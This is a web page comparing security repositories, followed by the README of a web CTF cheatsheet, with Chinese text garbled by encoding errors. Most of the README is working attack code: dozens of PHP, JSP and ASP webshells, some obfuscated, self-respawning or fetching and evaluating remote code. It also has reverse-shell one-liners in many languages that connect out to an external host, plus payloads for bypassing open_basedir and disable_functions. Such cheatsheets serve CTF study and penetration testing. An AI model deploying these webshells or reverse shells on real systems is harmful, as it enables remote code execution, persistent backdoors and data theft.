Top Related Projects
60,720
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
57,590
SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
27,866
The OWASP Cheat Sheet Series was created to provide a concise collection of high value information on specific application security topics.
5,837
A list of interesting payloads, tips and tricks for bug bounty hunters.
4,930
Penetration Testing Reference Bank - OSCP / PTP & PTX Cheatsheet
4,802
Awesome XSS stuff
Quick Overview
The w181496/Web-CTF-Cheatsheet repository is a comprehensive collection of cheatsheets and resources for web-based Capture the Flag (CTF) challenges. It covers a wide range of topics, including web application security, cryptography, and various hacking techniques, making it a valuable resource for security enthusiasts and professionals.
Pros
- Comprehensive Coverage: The repository covers a wide range of web-based CTF topics, providing a one-stop-shop for learning and reference.
- Actively Maintained: The project is actively maintained, with regular updates and contributions from the community.
- Beginner-Friendly: The cheatsheets are well-organized and easy to understand, making them accessible to both beginners and experienced security professionals.
- Community-Driven: The project encourages community participation, with contributors sharing their knowledge and experiences.
Cons
- Potential Outdated Information: As the field of web security is constantly evolving, some of the information in the cheatsheets may become outdated over time.
- Lack of Detailed Explanations: While the cheatsheets provide a good overview of various topics, they may not always provide in-depth explanations or step-by-step guides.
- Scattered Organization: The repository contains a large number of cheatsheets, which can make it challenging to navigate and find specific information.
- Limited Hands-on Exercises: The project primarily focuses on providing reference material, with limited hands-on exercises or practical examples.
Code Examples
N/A (This is not a code library)
Getting Started
N/A (This is not a code library)
Competitor Comparisons
60,720
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Pros of PayloadsAllTheThings
- More comprehensive coverage of various attack vectors and techniques
- Better organized with clear categorization and subcategories
- Regularly updated with contributions from a larger community
Cons of PayloadsAllTheThings
- Can be overwhelming for beginners due to its extensive content
- Less focused on CTF-specific scenarios and challenges
Code Comparison
PayloadsAllTheThings (SQL Injection):
' OR '1'='1
' UNION SELECT NULL,NULL,NULL--
UNION ALL SELECT NULL,NULL,(SELECT CONCAT(table_name,0x0a) FROM information_schema.tables WHERE table_schema=DATABASE())--
Web-CTF-Cheatsheet (SQL Injection):
admin' --
admin' #
admin'/*
' UNION SELECT 1,2,3--
PayloadsAllTheThings provides more complex and varied examples, while Web-CTF-Cheatsheet offers simpler, CTF-oriented payloads.
Summary
PayloadsAllTheThings is a more extensive resource covering a wide range of web security topics, making it suitable for both CTF participants and security professionals. Web-CTF-Cheatsheet is more focused on common CTF challenges, providing concise and practical information for competition scenarios. Both repositories offer valuable insights, with PayloadsAllTheThings being more comprehensive and Web-CTF-Cheatsheet being more targeted towards CTF events.
57,590
SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
Pros of SecLists
- Comprehensive collection of multiple types of lists used in security assessments
- Regularly updated with contributions from the community
- Well-organized directory structure for easy navigation
Cons of SecLists
- Large repository size may be overwhelming for beginners
- Lacks specific guidance on how to use the lists effectively
- Not tailored specifically for web-based CTF challenges
Code Comparison
Web-CTF-Cheatsheet example (SQL injection):
' OR '1'='1
' OR 1=1--
' UNION SELECT NULL,NULL,NULL--
SecLists example (SQL injection):
' OR '1'='1
' OR 1=1#
' UNION SELECT username, password FROM users#
Both repositories provide similar SQL injection examples, but Web-CTF-Cheatsheet focuses more on CTF-specific payloads, while SecLists offers a broader range of injection techniques.
Web-CTF-Cheatsheet is more focused on web-based CTF challenges, providing concise and targeted information for competitors. SecLists, on the other hand, is a more extensive resource for various security testing scenarios, making it valuable for professional penetration testers and security researchers.
27,866
The OWASP Cheat Sheet Series was created to provide a concise collection of high value information on specific application security topics.
Pros of CheatSheetSeries
- Comprehensive coverage of web security topics beyond CTF scenarios
- Regularly updated and maintained by a large community of security experts
- Provides detailed explanations and best practices for each security concept
Cons of CheatSheetSeries
- Less focused on specific CTF techniques and challenges
- May be overwhelming for beginners due to its extensive content
- Lacks concise, quick-reference format for CTF competitions
Code Comparison
CheatSheetSeries example (SQL Injection Prevention):
String query = "SELECT * FROM accounts WHERE custID=? AND password=?";
PreparedStatement pstmt = connection.prepareStatement(query);
pstmt.setString(1, custID);
pstmt.setString(2, password);
ResultSet results = pstmt.executeQuery();
Web-CTF-Cheatsheet example (SQL Injection):
' OR '1'='1
' UNION SELECT 1,2,3--
' UNION SELECT NULL,NULL,NULL,NULL,NULL--
The CheatSheetSeries focuses on secure coding practices, while Web-CTF-Cheatsheet provides examples of exploit techniques commonly used in CTF challenges.
5,837
A list of interesting payloads, tips and tricks for bug bounty hunters.
Pros of bugbounty-cheatsheet
- More focused on real-world bug bounty scenarios and practical exploitation techniques
- Includes a wider range of vulnerability types and attack vectors
- Regularly updated with contributions from the bug bounty community
Cons of bugbounty-cheatsheet
- Less comprehensive coverage of specific CTF-style challenges
- Fewer detailed explanations and step-by-step guides for beginners
- Limited focus on web-specific vulnerabilities compared to Web-CTF-Cheatsheet
Code Comparison
Web-CTF-Cheatsheet:
import requests
r = requests.get('http://example.com')
print(r.text)
bugbounty-cheatsheet:
curl -X POST -H "Content-Type: application/json" -d '{"username":"admin","password":"password"}' http://example.com/api/login
The Web-CTF-Cheatsheet example demonstrates a simple Python script for making HTTP requests, while the bugbounty-cheatsheet example shows a more complex curl command for testing API endpoints, reflecting the different focus areas of each repository.
Both cheatsheets serve valuable purposes in their respective domains. Web-CTF-Cheatsheet is better suited for those preparing for CTF competitions and learning web security concepts, while bugbounty-cheatsheet is more appropriate for active bug hunters and security professionals working on real-world targets.
4,930
Penetration Testing Reference Bank - OSCP / PTP & PTX Cheatsheet
Pros of Cheatsheet-God
- Broader scope covering various cybersecurity topics beyond web-specific CTF challenges
- More extensive collection of resources and tools for different security domains
- Includes practical examples and command usage for many tools
Cons of Cheatsheet-God
- Less focused on web-specific CTF challenges, which may be less helpful for dedicated web CTF participants
- Organization can be overwhelming due to the sheer volume of information
Code Comparison
Web-CTF-Cheatsheet:
# SQL Injection
' OR '1'='1
' UNION SELECT NULL,NULL,NULL--
Cheatsheet-God:
# Nmap scanning
nmap -sC -sV -oA nmap/initial 10.10.10.10
nmap -p- -oA nmap/allports 10.10.10.10
The code snippets demonstrate the different focus areas of each repository. Web-CTF-Cheatsheet provides specific web exploitation techniques, while Cheatsheet-God offers a broader range of security tools and commands.
Both repositories serve as valuable resources for cybersecurity enthusiasts, with Web-CTF-Cheatsheet being more specialized for web-based CTF challenges and Cheatsheet-God offering a comprehensive collection of security-related cheatsheets and tools across various domains.
4,802
Awesome XSS stuff
Pros of AwesomeXSS
- Focused specifically on XSS, providing in-depth coverage of this particular attack vector
- Includes a comprehensive list of XSS payloads for various scenarios
- Offers practical examples and real-world applications of XSS techniques
Cons of AwesomeXSS
- Limited scope compared to Web-CTF-Cheatsheet, which covers a broader range of web security topics
- Less frequently updated, with the last commit being over a year ago
- Lacks the structured organization found in Web-CTF-Cheatsheet
Code Comparison
AwesomeXSS payload example:
<svg/onload=alert(1)>
Web-CTF-Cheatsheet SQL injection example:
' UNION SELECT NULL,NULL,NULL-- -
Both repositories provide valuable resources for web security enthusiasts and professionals. AwesomeXSS excels in its focused approach to XSS vulnerabilities, offering a wide array of payloads and techniques. On the other hand, Web-CTF-Cheatsheet provides a more comprehensive overview of various web security topics, making it a versatile resource for CTF participants and security researchers.
While AwesomeXSS offers more depth in XSS-specific content, Web-CTF-Cheatsheet covers a broader range of topics and is more frequently updated. The choice between the two depends on the user's specific needs and areas of interest in web security.
Convert 
designs to code with AI
Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.
Try Visual CopilotREADME
WEB CTF CheatSheet
Table of Contents
- Webshell
- Reverse Shell
- PHP Tag
- PHP Weak Type
- PHP Feature
- Command Injection
- SQL Injection
- LFI
- Upload
- Serialization
- SSTI / CSTI
- SSRF
- XXE
- Prototype Pollution
- Frontend
- Crypto
- Others
- Tools and Website
Webshell
PHP Webshell
<?php system($_GET["cmd"]); ?>
<?php system($_GET[1]); ?>
<?php system("`$_GET[1]`"); ?>
<?= system($_GET[cmd]);
<?=`$_GET[1]`;
<?php eval($_POST[cmd]);?>
<?php echo `$_GET[1]`;
<?php echo passthru($_GET['cmd']);
<?php echo shell_exec($_GET['cmd']);
<?php eval(str_rot13('riny($_CBFG[cntr]);'));?>
<script language="php">system("id"); </script>
<?php $_GET['a']($_GET['b']); ?>
// a=system&b=ls
// a=assert&b=system("ls")
<?php array_map("ass\x65rt",(array)$_REQUEST['cmd']);?>
// .php?cmd=system("ls")
<?@extract($_REQUEST);@die($f($c));?>
// .php?f=system&c=id
<?php @include($_FILES['u']['tmp_name']);
// æ§é <form action="http://x.x.x.x/shell.php" method="POST" enctype="multipart/form-data">ä¸å³
// ææ«åæªincludeé²ä¾
// From: http://www.zeroplace.cn/article.asp?id=906
<?php $x=~¾¬¬ºÂ«;$x($_GET['a']); ?>
// not backdoor (assert)
// .php?a=system("ls")
echo "{${phpinfo()}}";
echo "${system(ls)}";
echo Y2F0IGZsYWc= | base64 -d | sh
// Y2F0IGZsYWc= => cat flag
echo -e "<?php passthru(\$_POST[1])?>;\r<?php echo 'A PHP Test ';" > shell.php
// cat shell.php
// <?php echo 'A PHP Test ';" ?>
echo ^<?php eval^($_POST['a']^); ?^> > a.php
// Windows echoå°åºä¸å¥è©±
<?php fwrite(fopen("gggg.php","w"),"<?php system(\$_GET['a']);");
<?php
header('HTTP/1.1 404');
ob_start();
phpinfo();
ob_end_clean();
?>
<?php
// ç¡å顯å¾é
// e.g. ?pass=file_get_contents('http://kaibro.tw/test')
ob_start('assert');
echo $_REQUEST['pass'];
ob_end_flush();
?>
<?=
// æ²æè±æ¸åçwebshell
$ð© = '[[[[@@' ^ '("(/%-';
$ð©(('@@['^'#!/')." /????");
A=fl;B=ag;cat $A$B
webshellé§çè¨æ¶é«
解æ³ï¼restart
<?php
ignore_user_abort(true); // 忽ç¥é£ç·ä¸æ·
set_time_limit(0); // è¨å®ç¡å·è¡æéä¸é
$file = 'shell.php';
$code = '<?php eval($_POST[a]);?>';
while(md5(file_get_contents($file)) !== md5($code)) {
if(!file_exists($file)) {
file_put_contents($file, $code);
}
usleep(50);
}
?>
ç¡æ件webshell
解æ³ï¼restart
<?php
unlink(__FILE__);
ignore_user_abort(true);
set_time_limit(0);
$remote_file = 'http://xxx/xxx.txt';
while($code = file_get_contents($remote_file)){
@eval($code);
sleep(5);
};
?>
JSP Webshell
- ç¡å顯:
<%Runtime.getRuntime().exec(request.getParameter("i"));%>
- æå顯:
<%
if("kaibro".equals(request.getParameter("pwd"))) {
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
- Unicode webshell:
<%\u0052\u0075\u006E\u0074\u0069\u006D\u0065\u002E\u0067\u0065\u0074\u0052\u0075\u006E\u0074\u0069\u006D\u0065\u0028\u0029\u002E\u0065\u0078\u0065\u0063\u0028\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002E\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006D\u0065\u0074\u0065\u0072\u0028\u0022\u0069\u0022\u0029\u0029\u003B%>
(ææå <%Runtime.getRuntime().exec(request.getParameter("i"));%>)
- JSPX webshell:
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page"
version="1.2">
<jsp:directive.page contentType="text/html"/>
<jsp:declaration>
</jsp:declaration>
<jsp:scriptlet>
Runtime.getRuntime().exec(request.getParameter("i"));
</jsp:scriptlet>
<jsp:text>
</jsp:text>
</jsp:root>
- CP037 webshell:
Lo%C2%A7%C2%94%C2%93@%C2%A5%C2%85%C2%99%C2%A2%C2%89%C2%96%C2%95~%7F%C3%B1K%C3%B0%7F@%C2%85%C2%95%C2%83%C2%96%C2%84%C2%89%C2%95%C2%87~%7F%C2%83%C2%97%C3%B0%C3%B3%C3%B7%7Fon%25L%C2%91%C2%A2%C2%97z%C2%99%C2%96%C2%96%C2%A3@%C2%A7%C2%94%C2%93%C2%95%C2%A2z%C2%91%C2%A2%C2%97~%7F%C2%88%C2%A3%C2%A3%C2%97zaa%C2%91%C2%81%C2%A5%C2%81K%C2%A2%C2%A4%C2%95K%C2%83%C2%96%C2%94a%C3%91%C3%A2%C3%97a%C3%97%C2%81%C2%87%C2%85%7F%25@@%C2%A5%C2%85%C2%99%C2%A2%C2%89%C2%96%C2%95~%7F%C3%B1K%C3%B2%7Fn%25L%C2%91%C2%A2%C2%97z%C2%84%C2%89%C2%99%C2%85%C2%83%C2%A3%C2%89%C2%A5%C2%85K%C2%97%C2%81%C2%87%C2%85@%C2%83%C2%96%C2%95%C2%A3%C2%85%C2%95%C2%A3%C3%A3%C2%A8%C2%97%C2%85~%7F%C2%A3%C2%85%C2%A7%C2%A3a%C2%88%C2%A3%C2%94%C2%93%7Fan%25L%C2%91%C2%A2%C2%97z%C2%84%C2%85%C2%83%C2%93%C2%81%C2%99%C2%81%C2%A3%C2%89%C2%96%C2%95n%25La%C2%91%C2%A2%C2%97z%C2%84%C2%85%C2%83%C2%93%C2%81%C2%99%C2%81%C2%A3%C2%89%C2%96%C2%95n%25L%C2%91%C2%A2%C2%97z%C2%A2%C2%83%C2%99%C2%89%C2%97%C2%A3%C2%93%C2%85%C2%A3n%25%C3%99%C2%A4%C2%95%C2%A3%C2%89%C2%94%C2%85K%C2%87%C2%85%C2%A3%C3%99%C2%A4%C2%95%C2%A3%C2%89%C2%94%C2%85M%5DK%C2%85%C2%A7%C2%85%C2%83M%C2%99%C2%85%C2%98%C2%A4%C2%85%C2%A2%C2%A3K%C2%87%C2%85%C2%A3%C3%97%C2%81%C2%99%C2%81%C2%94%C2%85%C2%A3%C2%85%C2%99M%7F%C2%89%7F%5D%5D%5E%25La%C2%91%C2%A2%C2%97z%C2%A2%C2%83%C2%99%C2%89%C2%97%C2%A3%C2%93%C2%85%C2%A3n%25L%C2%91%C2%A2%C2%97z%C2%A3%C2%85%C2%A7%C2%A3n%25La%C2%91%C2%A2%C2%97z%C2%A3%C2%85%C2%A7%C2%A3n%25La%C2%91%C2%A2%C2%97z%C2%99%C2%96%C2%96%C2%A3n%25
(ææåä¸ JSPX webshell: Runtime.getRuntime().exec(request.getParameter("i"));)
- EL webshell:
${Runtime.getRuntime().exec("touch /tmp/pwned")}
ASP Webshell
<%eval request("kaibro")%>
<%execute request("kaibro")%>
<%ExecuteGlobal request("kaibro")%>
<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>
ASPX Webshell
- ä¸è¬:
<%@ Page Language="Jscript"%><%eval(Request.Item["kaibro"],"unsafe");%>
- ä¸å³:
<%if (Request.Files.Count!=0){Request.Files[0].SaveAs(Server.MapPath(Request["f"]));}%>
Reverse Shell
-
æ¬æ©Listen Port
ncat -vl 5566
-
Perl
perl -e 'use Socket;$i="kaibro.tw";$p=5566;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
-
Bash
bash -i >& /dev/tcp/kaibro.tw/5566 0>&1bash -c 'bash -i >& /dev/tcp/kaibro.tw/5566 0>&1'0<&196;exec 196<>/dev/tcp/kaibro.tw/5566; sh <&196 >&196 2>&196
-
PHP
php -r '$sock=fsockopen("kaibro.tw",5566);exec("/bin/sh -i <&3 >&3 2>&3");'
-
NC
nc -e /bin/sh kaibro.tw 5566
-
Telnet
mknod backpipe p && telnet kaibro.tw 5566 0<backpipe | /bin/bash 1>backpipe
-
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("kaibro.tw",5566));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
-
Ruby
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("kaibro.tw","5566");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
-
Node.js
var net = require("net"), sh = require("child_process").exec("/bin/bash"); var client = new net.Socket(); client.connect(5566, "kaibro.tw", function(){client.pipe(sh.stdin);sh.stdout.pipe(client); sh.stderr.pipe(client);});require('child_process').exec("bash -c 'bash -i >& /dev/tcp/kaibro.tw/5566 0>&1'");
-
Java
Runtime r = Runtime.getRuntime();Process p = r.exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/kaibro.tw/5278;cat <&5 | while read line; do $line 2>&5 >&5; done"});p.waitFor();java.lang.Runtime.exec()payload generator: http://www.jackson-t.ca/runtime-exec-payloads.html
-
Powershell
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c kaibro.tw -p 5566 -e cmd
PHP Tag
<? ?>- short_open_tag 決å®æ¯å¦å¯ä½¿ç¨çæ¨è¨
- ææ¯ç·¨è¯phpæ --enable-short-tags
<?=- çå¹ <? echo
- èª
PHP 5.4.0èµ·ï¼always work!
<% %>ã<%=- èª
PHP 7.0.0èµ·ï¼è¢«ç§»é¤ - é å°
asp_tagsè¨æOn
- èª
<script language="php"- èª
PHP 7.0.0èµ·ï¼è¢«ç§»é¤ <script language="php">system("id"); </script>
- èª
PHP Weak Type
-
var_dump('0xABCdef' == ' 0xABCdef');- true (Output for hhvm-3.18.5 - 3.22.0, 7.0.0 - 7.2.0rc4: false)
-
var_dump('0010e2' == '1e3â);- true
-
strcmp([],[])- 0
-
sha1([])- NULL
-
'123' == 123 -
'abc' == 0 -
'123a' == 123 -
'0x01' == 1- PHP 7.0 å¾ï¼16 é²ä½å串ä¸åç¶ææ¸å
- e.g
var_dump('0x01' == 1)=> false
-
'' == 0 == false == NULL -
md5([1,2,3]) == md5([4,5,6]) == NULL- å¯ç¨å¨ç»å ¥ç¹é (ç¨æ¶ä¸åå¨ï¼å password çº NULL)
-
var_dump(md5(240610708));- 0e462097431906509019562988736854
-
var_dump(sha1(10932435112));- 0e07766915004133176347055865026311692244
-
$a="123"; $b="456"$a + $b == "579";$a . $b == "123456"
-
$a = 0; $b = 'x';$a == false=> true$a == $b=> true$b == true=> true
-
$a = 'a'++$a=>'b'$a+1=>1
PHP å ¶ä»ç¹æ§
Overflow
- 32ä½å
intval('1000000000000')=>2147483647
- 64ä½å
intval('100000000000000000000')=>9223372036854775807
æµ®é»æ¸ç²¾åº¦
-
php -r "var_dump(1.000000000000001 == 1);"- false
-
php -r "var_dump(1.0000000000000001 == 1);"- true
-
$a = 0.1 * 0.1; var_dump($a == 0.01);- false
eregæ被NULLæªæ·
var_dump(ereg("^[a-zA-Z0-9]+$", "1234\x00-!@#%"));1
eregåeregiå¨ PHP 7.0.0 å·²ç¶è¢«ç§»é¤
intval
- åæ¨äºå
¥
var_dump(intval('5278.8787'));5278
intval(012)=> 10intval("012")=> 12
extractè®æ¸è¦è
extract($_GET);.php?_SESSION[name]=adminecho $_SESSION['name']=> 'admin'
trim
- ææå串åå¾ç空ç½(æå ¶ä»åå )å»æ
- æªæå®ç¬¬äºåæ¸ï¼é è¨æå»æ以ä¸åå
" "(0x20)"\t"(0x09)"\n"(0x0A)"\x0B"(0x0B)"\r"(0x0D)"\0"(0x00)
- å¯ä»¥ç¼ç¾é è¨ä¸å
å«
"\f"(0x0C)- æ¯è¼ï¼
is_numeric()å 許\få¨éé
- æ¯è¼ï¼
- å¦æåæ¸æ¯ unset æ空çè®æ¸ï¼åå³å¼æ¯ç©ºå串
is_numeric
-
is_numeric(" \t\r\n 123")=>true -
is_numeric(' 87')=>true -
is_numeric('87 ')=>false -
is_numeric(' 87 ')=>false -
is_numeric('0xdeadbeef')- PHP >= 7.0.0 =>
false - PHP < 7.0.0 =>
true - å¯ä»¥æ¿ä¾ç¹éæ³¨å ¥
- PHP >= 7.0.0 =>
-
以ä¸äº¦çºåæ³(è¿å True)å串:
' -.0''0.'' +2.1e5'' -1.5E+25''1.e5'
in_array
in_array('5 or 1=1', array(1, 2, 3, 4, 5))- true
in_array('kaibro', array(0, 1, 2))- true
in_array(array(), array('kai'=>false))- true
in_array(array(), array('kai'=>null))- true
in_array(array(), array('kai'=>0))- false
in_array(array(), array('kai'=>'bro'))- false
in_array('kai', array('kai'=>true))- true
in_array('kai', array('kai'=>'bro'))- false
in_array('kai', array('kai'=>0))- true
in_array('kai', array('kai'=>1))- false
array_search
mixed array_search(mixed $needle , array $haystack [, bool $strict = false ])- å¨
haystacké£åä¸ï¼æå°needleçå¼ï¼æååè¿å indexï¼å¤±æè¿å False
- å¨
$strictçº false æï¼æ¡ç¨ä¸å´æ ¼æ¯è¼- é è¨æ¯ False
- Example
$arr=array(1,2,0); var_dump(array_search('kai', $arr))int(2)
$arr=array(1,2,0); var_dump(array_search('1', $arr))int(0)
parse_str
-
parse_str(string, array) -
æææ¥è©¢å串解æå°è®æ¸ä¸
-
å¦ææªè¨ç½®ç¬¬äºååæ¸ï¼æ解æå°ååè®æ¸ä¸
- PHP7.2 ä¸ä¸è¨ç½®ç¬¬äºååæ¸æç¢ç
E_DEPRECATEDè¦å
- PHP7.2 ä¸ä¸è¨ç½®ç¬¬äºååæ¸æç¢ç
-
parse_str('gg[kaibro]=5566');array(1) { ["kaibro"]=> string(4) "5566" } -
PHP è®æ¸æç©ºæ ¼å
.ï¼æ被è½æåºç·parse_str("na.me=kaibro&pass wd=ggininder",$test); var_dump($test); array(2) { ["na_me"]=> string(6) "kaibro" ["pass_wd"]=> string(9) "ggininder" }
parse_url
-
å¨èçå³å ¥ç URL ææåé¡
-
parse_url('/a.php?id=1')array(2) { ["host"]=> string(5) "a.php" ["query"]=> string(4) "id=1" } -
parse_url('//a/b')- host:
a
- host:
-
parse_url('..//a/b/c:80')- host:
.. - port:
80 - path:
//a/b/c:80
- host:
-
parse_url('///a.php?id=1')- false
-
parse_url('/a.php?id=1:80')- PHP < 7.0.0
false
- PHP >= 7.0.0
array(2) { ["path"]=> string(6) "/a.php" ["query"]=> string(7) "id=1:80" }
- PHP < 7.0.0
-
parse_url('http://kaibro.tw:87878')- 5.3.Xçæ¬ä»¥ä¸
array(3) { ["scheme"]=> string(4) "http" ["host"]=> string(9) "kaibro.tw" ["port"]=> int(22342) } - å ¶ä»ï¼ false
- 5.3.Xçæ¬ä»¥ä¸
preg_replace
mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )- æå°
$subjectä¸å¹é ç$patternï¼ä¸¦ç¨$replacementæ¿æ
- æå°
- 第ä¸ååæ¸ç¨
/e修飾符ï¼$replacementæ被ç¶æ PHP code å·è¡- å¿ é æå¹é å°ææå·è¡
- PHP 5.5.0 èµ·ï¼æç¢ç
E_DEPRECATEDé¯èª¤ - PHP 7.0.0 ä¸åæ¯æ´ï¼ç¨
preg_replace_callback()代æ¿
example:
<?php
$a='phpkaibro';
echo preg_replace('/(.*)kaibro/e','\\1info()',$a);
sprintf / vprintf
- å°æ ¼å¼åå串çé¡åæ²æª¢æ¥
- æ ¼å¼ååä¸²ä¸ % å¾é¢çåå
(é¤äº % ä¹å¤)æ被ç¶æå串é¡ååæ
- ä¾å¦
%\ã%'ã%1$\' - å¨æäº SQLi é濾çæ³ä¸ï¼
%' and 1=1#ä¸çå®å¼èæ被è½ç¾©æ\'ï¼%\åæ被åæï¼'æåéé¸ - åçï¼sprintf 實ä½æ¯ç¨ switch...case...
- 碰å°æªç¥é¡åï¼
defaultä¸èç
- 碰å°æªç¥é¡åï¼
- ä¾å¦
file_put_contents
- 第äºååæ¸å¦ææ¯é£åï¼PHPææå®ä¸²æ¥æå串
- example:
<?php $test = $_GET['txt']; if(preg_match('[<>?]', $test)) die('bye'); file_put_contents('output', $test);- å¯ä»¥ç´æ¥
?txt[]=<?php phpinfo(); ?>å¯«å ¥
- å¯ä»¥ç´æ¥
spl_autoload_register
spl_autoload_register()å¯ä»¥èªåè¼å ¥ Class- ä¸æå®åæ¸ï¼æèªåè¼å
¥
.incå.php - Example:
- å¦æç®éä¸æ kaibro.incï¼ä¸å §å®¹çº class Kaibro{...}
- å
spl_autoload_register()ææéå Class è¼å ¥é²ä¾
è·¯å¾æ£è¦å
a.php/.file_put_contents("a.php/.", "<?php phpinfo() ?>");- å¯æå寫å
¥
- ç¶æ¸¬è©¦ Windows å¯ä»¥è¦å¯«ãLinux ç¡æ³
- å¯ä»¥ç¹éä¸äºæ£è¦è¡¨éå¼å¤æ·
- å¯æå寫å
¥
file_get_contents("a.php/.");- ç¶æ¸¬è©¦ Windows ä¸å¯æåè®ãLinux ç¡æ³
- éæå¾å¤å ¶ä» function ä¹é©ç¨
"=>.a"php
>=>?a.p>pa.>>>
<=>*a.<
URL query decode
$_GETæå°å³å ¥çåæ¸å URLdecode åè¿å$_SERVER['REQUEST_URI']å$_SERVER['QUERY_STRING']åæ¯ç´æ¥è¿å
Example:
Request: http://kaibro.tw/test.php?url=%67%67
-
$_GET:
[url] => gg -
$_SERVER['REQUEST_URI']:
/test.php?url=%67%67 -
$_SERVER['QUERY_STRING']:
url=%67%67
OPcache
-
ééå° PHP è ³æ¬ç·¨è¯æ Byte code çæ¹å¼å Cache ä¾æåæ§è½
-
ç¸éè¨å®å¨ php.ini ä¸
opcache.enableæ¯å¦åç¨opcache.file_cacheè¨å® cache ç®é- ä¾å¦:
opcache.file_cache="/tmp/opcache" /var/www/index.phpçæ«åææ¾å¨/tmp/opcache/[system_id]/var/www/index.php.bin
- ä¾å¦:
opcache.file_cache_onlyè¨å® cache æ件åªå ç´opcache.validate_timestampsæ¯å¦åç¨ timestamp é©è
-
system_idæ¯éé Zend å PHP çæ¬èè¨ç®åºä¾çï¼å¯ä»¥ç¢ºä¿ç¸å®¹æ§ -
æ以å¨æäºæ¢ä»¶ä¸å¯ééä¸å³è¦èæ«åæ件ä¾å¯« webshell
- system_id è¦åç®æ¨æ©å¨ä¸æ¨£
- timestamp è¦ä¸è´
-
https://github.com/GoSecure/php7-opcache-override
- Disassembler å¯ä»¥æ Byte code è½æ Pseudo code
-
Example
PCREå溯次æ¸éå¶ç¹é
- PHP ç PCRE åº«ä½¿ç¨ NFA ä½çºæ£è¦è¡¨éå¼å¼æ
- NFA å¨å¹é ä¸ä¸æï¼æå溯åè©¦å ¶ä»çæ
- PHP çºé²æ¢ DOSï¼è¨å®äº PCRE å溯次æ¸ä¸é
pcre.backtrack_limit- é è¨çº
1000000
- å溯次æ¸è¶
éä¸éæï¼
preg_match()æè¿åfalse - Example
- Code-Breaking Puzzles - pcrewaf
- N1CTF 2019 - sql_manage
open_basedirç¹é
- glob åç®é
$file_list = array();
$it = new DirectoryIterator("glob:///*");
foreach($it as $f) {
$file_list[] = $f->__toString();
}
sort($file_list);
foreach($file_list as $f){
echo "{$f}<br/>";
}
chdir('img');
ini_set('open_basedir','..');
chdir('..');chdir('..');
chdir('..');chdir('..');
ini_set('open_basedir','/');
echo(file_get_contents('flag'));
- symlinks
mkdir('/var/www/html/a/b/c/d/e/f/g/',0777,TRUE);
symlink('/var/www/html/a/b/c/d/e/f/g','foo');
ini_set('open_basedir','/var/www/html:bar/');
symlink('foo/../../../../../../','bar');
unlink('foo');
symlink('/var/www/html/','foo');
echo file_get_contents('bar/etc/passwd');
-
Fastcgi
-
...
disable_functionsç¹é
-
bash shellshock
-
mail()
sendmail- putenv寫LD_PRELOAD
- trick: LD_PRELOAD without sendmail/getuid()
-
mb_send_mail()
- è· mail() åºæ¬ä¸ä¸æ¨£
-
imap_mail()
- åä¸
-
imap_open()
<?php $payload = "echo hello|tee /tmp/executed"; $encoded_payload = base64_encode($payload); $server = "any -o ProxyCommand=echo\t".$encoded_payload."|base64\t-d|bash"; @imap_open('{'.$server.'}:143/imap}INBOX', '', ''); -
error_log()
- 第äºååæ¸
message_typeçº 1 æï¼æå»èª¿ç¨ sendmail
- 第äºååæ¸
-
ImageMagick
-
LD_PRELOAD + ghostscript:
- Imagemagick æç¨ ghostscriptå»parse
eps - Link
- Imagemagick æç¨ ghostscriptå»parse
-
LD_PRELOAD + ffpmeg
-
MAGICK_CODER_MODULE_PATH
-
MAGICK_CONFIGURE_PATH
delegates.xmlå®ç¾©èçå種æ件çè¦å- å¯ä»¥ç¨ putenv 寫æè¨å®æªè·¯å¾
- Link
<delegatemap> <delegate decode="ps:alpha" command="sh -c "/readflag > /tmp/output""/> </delegatemap> -
è
PATH+ ghostscript:- é ä¸åå·è¡æª gs
#include <stdlib.h> #include <string.h> int main() { unsetenv("PATH"); const char* cmd = getenv("CMD"); system(cmd); return 0; }putenv('PATH=/tmp/mydir'); putenv('CMD=/readflag > /tmp/mydir/output'); chmod('/tmp/mydir/gs','0777'); $img = new Imagick('/tmp/mydir/1.ept');
-
dl()
- è¼å ¥ module
dl("rce.so")- This function was removed from most SAPIs in PHP 5.3.0, and was removed from PHP-FPM in PHP 7.0.0.
-
FFI
- PHP 7.4 feature
- preloading + ffi
- e.g. RCTF 2019 - nextphp
<?php $ffi = FFI::cdef("int system (const char* command);"); $ffi->system("id"); -
Windows COM
- æ¢ä»¶
com.allow_dcom = trueextension=php_com_dotnet.dll
- PoC:
<?php $command = $_GET['cmd']; $wsh = new COM('WScript.shell'); // Shell.Application ä¹å¯ $exec = $wsh->exec("cmd /c".$command); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; - æ¢ä»¶
-
iconv
- https://gist.github.com/LoadLow/90b60bd5535d6c3927bb24d5f9955b80
- æ¢ä»¶
- å¯ä»¥ä¸å³
.so,gconv-modules - å¯ä»¥è¨å®ç°å¢è®æ¸
